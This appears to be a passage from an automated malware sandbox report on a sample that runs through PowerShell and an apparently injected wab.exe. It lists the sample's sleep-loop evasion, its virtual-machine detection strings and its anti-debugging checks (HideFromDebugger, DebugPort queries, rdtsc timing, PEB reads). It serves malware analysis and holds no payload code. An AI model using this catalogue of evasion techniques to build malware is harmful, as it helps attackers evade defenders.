Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2696 Thread sleep time: -5534023222112862s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4564 Thread sleep count: 6358 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7084 Thread sleep count: 3499 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5064 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4824 Thread sleep count: 2719 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5640 Thread sleep count: 3703 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5640 Thread sleep time: -11109000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5640 Thread sleep count: 2760 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5640 Thread sleep time: -8280000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3528 Thread sleep time: -11068046444225724s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5560 Thread sleep count: 6995 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6548 Thread sleep count: 2518 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6524 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1252 Thread sleep count: 571 > 30
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Program Files (x86)\Windows Mail\wab.exe Last function: Thread delayed
Source: C:\Program Files (x86)\Windows Mail\wab.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\clip.exe Last function: Thread delayed
Sleep loop found (likely to delay execution)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread sleep count: Count: 2719 delay: -5 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_222E10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 8_2_222E10F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_222E6580 FindFirstFileExA, 8_2_222E6580
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0040AE51 FindFirstFileW,FindNextFileW, 16_2_0040AE51
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 19_2_00407EF8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 20_2_00407898
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00418981 memset,GetSystemInfo, 16_2_00418981
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WCN\en-GB\
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en\
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Examples\
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\
Source: wscript.exe, 0000000D.00000002.2517453779.0000000003557000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000002.00000002.2710409921.00000214ABD20000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW1
Source: wab.exe, 00000008.00000003.2493992487.000000000647C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3295624818.0000000006491000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2493992487.000000000646C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537135847.0000000006491000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3295624818.000000000646D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2493992487.0000000006491000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537135847.000000000646C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537135847.000000000647C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3295624818.000000000647C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2885377459.0000000007413000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: wscript.exe, 0000000D.00000002.2517453779.0000000003557000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: powershell.exe, 0000000E.00000002.3267072681.00000000073D0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread information set: HideFromDebugger
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\clip.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FB096E rdtsc 25_2_21FB096E
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_049C8590 LdrInitializeThunk, 5_2_049C8590
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_222E2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_222E2639
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 16_2_0040DD85
Contains functionality to dynamically determine API calls
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 16_2_004044A4
Contains functionality to read the PEB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_222E4AB4 mov eax, dword ptr fs:[00000030h] 8_2_222E4AB4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FA01F8 mov eax, dword ptr fs:[00000030h] 25_2_21FA01F8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F951EF mov eax, dword ptr fs:[00000030h] 25_2_21F951EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F951EF mov eax, dword ptr fs:[00000030h] 25_2_21F951EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F951EF mov eax, dword ptr fs:[00000030h] 25_2_21F951EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F951EF mov eax, dword ptr fs:[00000030h] 25_2_21F951EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F951EF mov eax, dword ptr fs:[00000030h] 25_2_21F951EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F951EF mov eax, dword ptr fs:[00000030h] 25_2_21F951EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F951EF mov eax, dword ptr fs:[00000030h] 25_2_21F951EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F951EF mov eax, dword ptr fs:[00000030h] 25_2_21F951EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F951EF mov eax, dword ptr fs:[00000030h] 25_2_21F951EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F951EF mov eax, dword ptr fs:[00000030h] 25_2_21F951EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F951EF mov eax, dword ptr fs:[00000030h] 25_2_21F951EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F951EF mov eax, dword ptr fs:[00000030h] 25_2_21F951EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F951EF mov eax, dword ptr fs:[00000030h] 25_2_21F951EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F751ED mov eax, dword ptr fs:[00000030h] 25_2_21F751ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_22045227 mov eax, dword ptr fs:[00000030h] 25_2_22045227
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FAD1D0 mov eax, dword ptr fs:[00000030h] 25_2_21FAD1D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FAD1D0 mov ecx, dword ptr fs:[00000030h] 25_2_21FAD1D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F8B1B0 mov eax, dword ptr fs:[00000030h] 25_2_21F8B1B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_2202B256 mov eax, dword ptr fs:[00000030h] 25_2_2202B256
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_2202B256 mov eax, dword ptr fs:[00000030h] 25_2_2202B256
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FF019F mov eax, dword ptr fs:[00000030h] 25_2_21FF019F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FF019F mov eax, dword ptr fs:[00000030h] 25_2_21FF019F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FF019F mov eax, dword ptr fs:[00000030h] 25_2_21FF019F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FF019F mov eax, dword ptr fs:[00000030h] 25_2_21FF019F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6A197 mov eax, dword ptr fs:[00000030h] 25_2_21F6A197
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6A197 mov eax, dword ptr fs:[00000030h] 25_2_21F6A197
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6A197 mov eax, dword ptr fs:[00000030h] 25_2_21F6A197
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_2203D26B mov eax, dword ptr fs:[00000030h] 25_2_2203D26B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_2203D26B mov eax, dword ptr fs:[00000030h] 25_2_2203D26B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_22020274 mov eax, dword ptr fs:[00000030h] 25_2_22020274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_22020274 mov eax, dword ptr fs:[00000030h] 25_2_22020274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_22020274 mov eax, dword ptr fs:[00000030h] 25_2_22020274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_22020274 mov eax, dword ptr fs:[00000030h] 25_2_22020274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_22020274 mov eax, dword ptr fs:[00000030h] 25_2_22020274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_22020274 mov eax, dword ptr fs:[00000030h] 25_2_22020274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_22020274 mov eax, dword ptr fs:[00000030h] 25_2_22020274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_22020274 mov eax, dword ptr fs:[00000030h] 25_2_22020274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_22020274 mov eax, dword ptr fs:[00000030h] 25_2_22020274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_22020274 mov eax, dword ptr fs:[00000030h] 25_2_22020274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_22020274 mov eax, dword ptr fs:[00000030h] 25_2_22020274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_22020274 mov eax, dword ptr fs:[00000030h] 25_2_22020274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FB0185 mov eax, dword ptr fs:[00000030h] 25_2_21FB0185
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_22045283 mov eax, dword ptr fs:[00000030h] 25_2_22045283
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220062A0 mov eax, dword ptr fs:[00000030h] 25_2_220062A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220062A0 mov ecx, dword ptr fs:[00000030h] 25_2_220062A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220062A0 mov eax, dword ptr fs:[00000030h] 25_2_220062A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220062A0 mov eax, dword ptr fs:[00000030h] 25_2_220062A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220062A0 mov eax, dword ptr fs:[00000030h] 25_2_220062A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220062A0 mov eax, dword ptr fs:[00000030h] 25_2_220062A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220072A0 mov eax, dword ptr fs:[00000030h] 25_2_220072A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220072A0 mov eax, dword ptr fs:[00000030h] 25_2_220072A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6C156 mov eax, dword ptr fs:[00000030h] 25_2_21F6C156
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F76154 mov eax, dword ptr fs:[00000030h] 25_2_21F76154
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F76154 mov eax, dword ptr fs:[00000030h] 25_2_21F76154
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F77152 mov eax, dword ptr fs:[00000030h] 25_2_21F77152
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F69148 mov eax, dword ptr fs:[00000030h] 25_2_21F69148
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F69148 mov eax, dword ptr fs:[00000030h] 25_2_21F69148
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F69148 mov eax, dword ptr fs:[00000030h] 25_2_21F69148
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F69148 mov eax, dword ptr fs:[00000030h] 25_2_21F69148
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6B136 mov eax, dword ptr fs:[00000030h] 25_2_21F6B136
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6B136 mov eax, dword ptr fs:[00000030h] 25_2_21F6B136
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6B136 mov eax, dword ptr fs:[00000030h] 25_2_21F6B136
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6B136 mov eax, dword ptr fs:[00000030h] 25_2_21F6B136
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FA0124 mov eax, dword ptr fs:[00000030h] 25_2_21FA0124
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220452E2 mov eax, dword ptr fs:[00000030h] 25_2_220452E2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220212ED mov eax, dword ptr fs:[00000030h] 25_2_220212ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220212ED mov eax, dword ptr fs:[00000030h] 25_2_220212ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220212ED mov eax, dword ptr fs:[00000030h] 25_2_220212ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220212ED mov eax, dword ptr fs:[00000030h] 25_2_220212ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220212ED mov eax, dword ptr fs:[00000030h] 25_2_220212ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220212ED mov eax, dword ptr fs:[00000030h] 25_2_220212ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220212ED mov eax, dword ptr fs:[00000030h] 25_2_220212ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220212ED mov eax, dword ptr fs:[00000030h] 25_2_220212ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220212ED mov eax, dword ptr fs:[00000030h] 25_2_220212ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220212ED mov eax, dword ptr fs:[00000030h] 25_2_220212ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220212ED mov eax, dword ptr fs:[00000030h] 25_2_220212ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220212ED mov eax, dword ptr fs:[00000030h] 25_2_220212ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220212ED mov eax, dword ptr fs:[00000030h] 25_2_220212ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220212ED mov eax, dword ptr fs:[00000030h] 25_2_220212ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_2202F2F8 mov eax, dword ptr fs:[00000030h] 25_2_2202F2F8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6C0F0 mov eax, dword ptr fs:[00000030h] 25_2_21F6C0F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FB20F0 mov ecx, dword ptr fs:[00000030h] 25_2_21FB20F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6A0E3 mov ecx, dword ptr fs:[00000030h] 25_2_21F6A0E3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F950E4 mov eax, dword ptr fs:[00000030h] 25_2_21F950E4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F950E4 mov ecx, dword ptr fs:[00000030h] 25_2_21F950E4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F780E9 mov eax, dword ptr fs:[00000030h] 25_2_21F780E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FF20DE mov eax, dword ptr fs:[00000030h] 25_2_21FF20DE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F990DB mov eax, dword ptr fs:[00000030h] 25_2_21F990DB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_2203132D mov eax, dword ptr fs:[00000030h] 25_2_2203132D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_2203132D mov eax, dword ptr fs:[00000030h] 25_2_2203132D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_22045341 mov eax, dword ptr fs:[00000030h] 25_2_22045341
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F75096 mov eax, dword ptr fs:[00000030h] 25_2_21F75096
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_2202F367 mov eax, dword ptr fs:[00000030h] 25_2_2202F367
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FA909C mov eax, dword ptr fs:[00000030h] 25_2_21FA909C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F9D090 mov eax, dword ptr fs:[00000030h] 25_2_21F9D090
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F9D090 mov eax, dword ptr fs:[00000030h] 25_2_21F9D090
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F7208A mov eax, dword ptr fs:[00000030h] 25_2_21F7208A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_2201437C mov eax, dword ptr fs:[00000030h] 25_2_2201437C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F9C073 mov eax, dword ptr fs:[00000030h] 25_2_21F9C073
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_2204539D mov eax, dword ptr fs:[00000030h] 25_2_2204539D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F72050 mov eax, dword ptr fs:[00000030h] 25_2_21F72050
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F9B052 mov eax, dword ptr fs:[00000030h] 25_2_21F9B052
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_2202C3CD mov eax, dword ptr fs:[00000030h] 25_2_2202C3CD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6A020 mov eax, dword ptr fs:[00000030h] 25_2_21F6A020
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6C020 mov eax, dword ptr fs:[00000030h] 25_2_21F6C020
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F8E016 mov eax, dword ptr fs:[00000030h] 25_2_21F8E016
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F8E016 mov eax, dword ptr fs:[00000030h] 25_2_21F8E016
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F8E016 mov eax, dword ptr fs:[00000030h] 25_2_21F8E016
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F8E016 mov eax, dword ptr fs:[00000030h] 25_2_21F8E016
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220453FC mov eax, dword ptr fs:[00000030h] 25_2_220453FC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FA63FF mov eax, dword ptr fs:[00000030h] 25_2_21FA63FF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F803E9 mov eax, dword ptr fs:[00000030h] 25_2_21F803E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F803E9 mov eax, dword ptr fs:[00000030h] 25_2_21F803E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F803E9 mov eax, dword ptr fs:[00000030h] 25_2_21F803E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F803E9 mov eax, dword ptr fs:[00000030h] 25_2_21F803E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F803E9 mov eax, dword ptr fs:[00000030h] 25_2_21F803E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F803E9 mov eax, dword ptr fs:[00000030h] 25_2_21F803E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F803E9 mov eax, dword ptr fs:[00000030h] 25_2_21F803E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F803E9 mov eax, dword ptr fs:[00000030h] 25_2_21F803E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F7A3C0 mov eax, dword ptr fs:[00000030h] 25_2_21F7A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F7A3C0 mov eax, dword ptr fs:[00000030h] 25_2_21F7A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F7A3C0 mov eax, dword ptr fs:[00000030h] 25_2_21F7A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F7A3C0 mov eax, dword ptr fs:[00000030h] 25_2_21F7A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F7A3C0 mov eax, dword ptr fs:[00000030h] 25_2_21F7A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F7A3C0 mov eax, dword ptr fs:[00000030h] 25_2_21F7A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F783C0 mov eax, dword ptr fs:[00000030h] 25_2_21F783C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F783C0 mov eax, dword ptr fs:[00000030h] 25_2_21F783C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F783C0 mov eax, dword ptr fs:[00000030h] 25_2_21F783C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F783C0 mov eax, dword ptr fs:[00000030h] 25_2_21F783C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_2203903E mov eax, dword ptr fs:[00000030h] 25_2_2203903E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_2203903E mov eax, dword ptr fs:[00000030h] 25_2_2203903E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_2203903E mov eax, dword ptr fs:[00000030h] 25_2_2203903E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_2203903E mov eax, dword ptr fs:[00000030h] 25_2_2203903E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FA33A0 mov eax, dword ptr fs:[00000030h] 25_2_21FA33A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FA33A0 mov eax, dword ptr fs:[00000030h] 25_2_21FA33A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F933A5 mov eax, dword ptr fs:[00000030h] 25_2_21F933A5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F68397 mov eax, dword ptr fs:[00000030h] 25_2_21F68397
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F68397 mov eax, dword ptr fs:[00000030h] 25_2_21F68397
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F68397 mov eax, dword ptr fs:[00000030h] 25_2_21F68397
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_22045060 mov eax, dword ptr fs:[00000030h] 25_2_22045060
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FC739A mov eax, dword ptr fs:[00000030h] 25_2_21FC739A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FC739A mov eax, dword ptr fs:[00000030h] 25_2_21FC739A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F9438F mov eax, dword ptr fs:[00000030h] 25_2_21F9438F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F9438F mov eax, dword ptr fs:[00000030h] 25_2_21F9438F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6E388 mov eax, dword ptr fs:[00000030h] 25_2_21F6E388
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6E388 mov eax, dword ptr fs:[00000030h] 25_2_21F6E388
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6E388 mov eax, dword ptr fs:[00000030h] 25_2_21F6E388
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F77370 mov eax, dword ptr fs:[00000030h] 25_2_21F77370
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F77370 mov eax, dword ptr fs:[00000030h] 25_2_21F77370
